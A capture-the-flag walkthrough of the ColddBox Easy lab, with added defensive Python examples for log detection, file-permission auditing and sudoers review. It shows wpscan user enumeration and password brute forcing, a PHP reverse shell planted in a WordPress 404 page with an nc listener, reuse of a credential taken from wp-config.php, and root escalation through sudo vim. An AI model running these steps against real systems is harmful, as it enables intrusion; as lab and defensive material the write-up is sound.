Nmap

First we scan the target for open ports and services.

# nmap -p- -T4 -sV -sC 10.10.43.240 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-11 00:18 BST
Nmap scan report for 10.10.43.240
Host is up (0.023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ColddBox | One more machine
|_http-generator: WordPress 4.1.31
|_http-server-header: Apache/2.4.18 (Ubuntu)
4512/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
|   256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
|_  256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.98 seconds

Website

The website is running WordPress. This is shown on the site itself and was also identified in the nmap scan. Looking through the contents of the site did not show anything obvious, so we run wpscan.

# wpscan --url http://10.10.43.240/ -e vp,vt,cb,dbe,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.10.43.240/ [10.10.43.240]
[+] Started: Mon Aug 11 00:26:32 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.43.240/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.43.240/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.43.240/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.43.240/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
 |  - http://10.10.43.240/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>

[+] WordPress theme in use: twentyfifteen
 | Location: http://10.10.43.240/wp-content/themes/twentyfifteen/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: http://10.10.43.240/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 4.0
 | Style URL: http://10.10.43.240/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.43.240/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:03 <==================================================================================================================> (652 / 652) 100.00% Time: 00:00:03
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===================================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <=========================================================================================================================> (75 / 75) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] the cold in person
 | Found By: Rss Generator (Passive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] c0ldd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Aug 11 00:26:46 2025
[+] Requests Done: 940
[+] Cached Requests: 10
[+] Data Sent: 239.568 KB
[+] Data Received: 22.623 MB
[+] Memory used: 293.793 MB
[+] Elapsed time: 00:00:14

The scan has given us four usernames. Next we use the --passwords flag of wpscan to brute force their logins.

# wpscan --url http://10.10.43.240/ --passwords /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt
...
...
...

[i] User(s) Identified:

[+] the cold in person
 | Found By: Rss Generator (Passive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] c0ldd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Wp Login against 4 user/s
[SUCCESS] - c0ldd / **********                                                                                                                                                                    
Trying hugo / blitz Time: 00:46:51 <==========================================================================================                             > (32915 / 42915) 76.69%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: c0ldd, Password: **********
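What the enumeration and brute force above look like from the server side. This is an added detection example, not part of the writeup: it runs over constructed Apache combined-format log lines (placeholder client address 203.0.113.7) and flags the author-ID sweep, the readme.html/xmlrpc.php probes and the wp-login.php password guessing; the thresholds are assumptions to tune per site.

```python
import re
from collections import defaultdict

# Apache combined log format; groups: client ip, method, path, status, user agent.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')
PROBE_PATHS = {"/readme.html", "/xmlrpc.php", "/wp-cron.php"}  # files wpscan checked above

def analyse(log_text, author_ids=3, failed_logins=20):
    """Return {ip: [findings]} for clients showing WordPress enumeration or brute forcing."""
    authors, fails, probes = defaultdict(set), defaultdict(int), defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status, _ua = m.groups()
        q = re.search(r"[?&]author=(\d+)", path)
        if q:  # /?author=N sweep: WordPress redirects to /author/<login>/, leaking the username
            authors[ip].add(q.group(1))
        # A failed wp-login.php POST returns 200 with the error page; a success is a 302 redirect.
        if method == "POST" and path.startswith("/wp-login.php") and status == "200":
            fails[ip] += 1
        if path.split("?")[0] in PROBE_PATHS:
            probes[ip].add(path.split("?")[0])
    findings = defaultdict(list)
    for ip, ids in authors.items():
        if len(ids) >= author_ids:
            findings[ip].append(f"author id enumeration ({len(ids)} ids)")
    for ip, n in fails.items():
        if n >= failed_logins:
            findings[ip].append(f"wp-login.php brute force ({n} failed POSTs)")
    for ip, paths in probes.items():
        if len(paths) >= 2:
            findings[ip].append("fingerprint probes: " + ", ".join(sorted(paths)))
    return dict(findings)

# Constructed sample log: placeholder scanner 203.0.113.7 plus one ordinary visitor.
UA = "WPScan v3.8.28"
SAMPLE_LOG = "\n".join(
    [f'203.0.113.7 - - [11/Aug/2025:00:26:33 +0100] "GET /?author={i} HTTP/1.1" 301 0 "-" "{UA}"'
     for i in range(1, 11)]
    + [f'203.0.113.7 - - [11/Aug/2025:00:26:34 +0100] "GET {p} HTTP/1.1" 200 512 "-" "{UA}"'
       for p in ("/readme.html", "/xmlrpc.php")]
    + [f'203.0.113.7 - - [11/Aug/2025:00:27:{i:02d} +0100] "POST /wp-login.php HTTP/1.1" 200 3924 "-" "{UA}"'
       for i in range(25)]
    + ['198.51.100.9 - - [11/Aug/2025:00:27:05 +0100] "GET /index.php HTTP/1.1" 200 11842 "-" "Mozilla/5.0"'])

if __name__ == "__main__":
    for ip, notes in analyse(SAMPLE_LOG).items():
        print(ip, *notes, sep="\n  ")
```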

With the valid credentials we can now log in to WordPress. From the administrative panel we can edit the site so that we get a reverse shell; in this case a PHP reverse shell is added to the 404 page.

By visiting a nonexistent WordPress URL we trigger the reverse shell.

# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [110.10.43.240] 34160
Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 00:20:25 up  1:17,  0 users,  load average: 0.00, 0.00, 0.32
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Looking around on the box we find the WordPress files in /var/www/html. Inside the config file there is a password listed for one of the known usernames.

$ cd /var/www/html

$ ls -lah
total 192K
drwxr-xr-x  6 root     root     4.0K Oct 14  2020 .
drwxr-xr-x  3 root     root     4.0K Oct 14  2020 ..
drwxr-xr-x  2 root     root     4.0K Oct 19  2020 hidden
-rw-r--r--  1 www-data www-data  418 Sep 25  2013 index.php
-rw-r--r--  1 www-data www-data  20K Sep 24  2020 license.txt
-rw-r--r--  1 www-data www-data 7.1K Sep 24  2020 readme.html
-rw-r--r--  1 www-data www-data 6.3K Sep 24  2020 wp-activate.php
drwxr-xr-x  9 www-data www-data 4.0K Dec 18  2014 wp-admin
-rw-r--r--  1 www-data www-data  271 Jan  8  2012 wp-blog-header.php
-rw-r--r--  1 www-data www-data 5.1K Sep 24  2020 wp-comments-post.php
-rw-r--r--  1 www-data www-data 2.7K Sep  9  2014 wp-config-sample.php
-rw-rw-rw-  1 www-data www-data 3.0K Oct 14  2020 wp-config.php
drwxr-xr-x  6 www-data www-data 4.0K Oct 19  2020 wp-content
-rw-r--r--  1 www-data www-data 2.9K May 13  2014 wp-cron.php
drwxr-xr-x 12 www-data www-data 4.0K Dec 18  2014 wp-includes
-rw-r--r--  1 www-data www-data 2.4K Oct 25  2013 wp-links-opml.php
-rw-r--r--  1 www-data www-data 2.7K Jul  7  2014 wp-load.php
-rw-r--r--  1 www-data www-data  33K Sep 24  2020 wp-login.php
-rw-r--r--  1 www-data www-data 8.3K Sep 24  2020 wp-mail.php
-rw-r--r--  1 www-data www-data  11K Jul 18  2014 wp-settings.php
-rw-r--r--  1 www-data www-data  25K Nov 30  2014 wp-signup.php
-rw-r--r--  1 www-data www-data 4.0K Nov 30  2014 wp-trackback.php
-rw-r--r--  1 www-data www-data 3.0K Feb  9  2014 xmlrpc.php

$ cat wp-config.php
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');

/** MySQL database username */
define('DB_USER', 'c0ldd');

/** MySQL database password */
define('DB_PASSWORD', '*************');

/** MySQL hostname */
define('DB_HOST', 'localhost');
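The listing above shows wp-config.php as -rw-rw-rw-, i.e. world-writable, on top of holding the database password that turns out to be reused for a system account. The following is an added example, not code from the writeup: it audits an `ls -l` listing against a simple permission policy (the 0640/0644 limits are an assumed policy in line with common WordPress hardening guidance).

```python
# Policy for a WordPress docroot: wp-config.php carries DB_PASSWORD and the auth salts,
# so 0640 is the most it should have (0440 or 0400 when the web server need not write
# it); no other file should be group- or world-writable.
MAX_MODE = {"wp-config.php": 0o640}
DEFAULT_MAX = 0o644

def symbolic_to_octal(mode):
    """'-rw-rw-rw-' -> 0o666; s/t in an execute slot count as executable, S/T do not."""
    value = 0
    for ch in mode[1:10]:
        value = (value << 1) | (ch in "rwxst")
    return value

def audit_listing(listing):
    """Return findings for regular files in `ls -l` output that exceed the policy."""
    findings = []
    for line in listing.splitlines():
        parts = line.split(None, 8)
        if len(parts) < 9 or parts[0][0] != "-":   # skip 'total', directories, . and ..
            continue
        mode, name = parts[0], parts[8]
        octal = symbolic_to_octal(mode)
        limit = MAX_MODE.get(name, DEFAULT_MAX)
        extra = octal & ~limit & 0o777
        if extra:
            findings.append(f"{name}: mode {octal:04o} exceeds policy {limit:04o} (extra bits {extra:04o})")
        if octal & 0o002:
            findings.append(f"{name}: world-writable; any local account can rewrite it, "
                            "and for a PHP file that means code execution as the web server")
    return findings

# Constructed from the `ls -lah` output in the writeup (columns as printed).
LISTING = """\
total 192K
drwxr-xr-x  6 root     root     4.0K Oct 14  2020 .
-rw-r--r--  1 www-data www-data  418 Sep 25  2013 index.php
-rw-r--r--  1 www-data www-data 2.7K Sep  9  2014 wp-config-sample.php
-rw-rw-rw-  1 www-data www-data 3.0K Oct 14  2020 wp-config.php
drwxr-xr-x  6 www-data www-data 4.0K Oct 19  2020 wp-content
-rw-r--r--  1 www-data www-data 3.0K Feb  9  2014 xmlrpc.php
"""

if __name__ == "__main__":
    print(*audit_listing(LISTING), sep="\n")
```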

Using these discovered credentials we first upgrade to a better shell with Python and then su to the c0ldd account. This gets us the user flag.

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

ww-data@ColddBox-Easy:/var/www/html$ su - c0ldd 
su - c0ldd
Password: *************

c0ldd@ColddBox-Easy:~$ ls
ls
user.txt
c0ldd@ColddBox-Easy:~$ cat user.txt
cat user.txt
Rm********************************************==

Privilege escalation

We can SSH into the box using the discovered credentials, which makes things a bit more usable. Checking our sudo permissions we see three entries.

# ssh c0ldd@10.10.201.143 -p 4512    


 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


Pueden actualizarse 129 paquetes.
92 actualizaciones son de seguridad.


Last login: Mon Nov  8 13:20:08 2021 from 10.0.2.15
c0ldd@ColddBox-Easy:~$ ls
user.txt
c0ldd@ColddBox-Easy:~$ sudo -l
[sudo] password for c0ldd: 
Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
c0ldd@ColddBox-Easy:~$ 
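From the defender's side, the three grants above are the kind of sudoers entries a review should catch before anyone needs vim to escape from them. This is an added example, not part of the writeup: it parses the `sudo -l` output shown above (the "(runas) command" lines are the same in every locale, so the Spanish headers do not matter) and reports why each entry is unsuitable for root and what to replace it with; the wording of the recommendations is mine.

```python
import re

# A `sudo -l` entry line looks like "(runas) [TAG: ...] command [args][, command ...]".
ENTRY_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+)$")

# Why each of the grants seen above is unsuitable for root, and the safer alternative.
RISK = {
    "vim": "interactive editor, edits any file and runs commands as root; "
           "replace with sudoedit (sudo -e), which edits a copy as the calling user",
    "chmod": "can set setuid or world-writable bits on any file as root; "
             "pin the exact arguments in sudoers or drop the grant",
    "ftp": "interactive network client as root, writes fetched files anywhere; "
           "run it unprivileged or move the job to a dedicated account",
}

def audit_sudo(text):
    """Return findings for each (runas) command line in `sudo -l` output."""
    findings = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.groups()
        for cmd in cmds.split(", "):
            if cmd == "ALL":
                findings.append(f"({runas}) ALL: unrestricted; every command runs as {runas}")
                continue
            prog, _, args = cmd.partition(" ")
            name = prog.rsplit("/", 1)[-1]
            if not args:  # in sudoers a bare path allows any arguments; "" would forbid them
                findings.append(f"{prog} as {runas}: no argument restriction")
            if name in RISK:
                findings.append(f"{prog} as {runas}: {RISK[name]}")
            if "NOPASSWD" in tags:
                findings.append(f"{prog} as {runas}: NOPASSWD, no re-authentication")
    return findings

# The `sudo -l` output from the writeup (raw string: secure_path contains backslashes).
SUDO_L = r"""
Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
"""

if __name__ == "__main__":
    print(*audit_sudo(SUDO_L), sep="\n")
```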

Using vim we can get a shell as root and grab the flag.

c0ldd@ColddBox-Easy:~$ sudo vim -c ':!/bin/sh'

# id
uid=0(root) gid=0(root) grupos=0(root)
# cd /root
# cat root.txt
wq***********************************=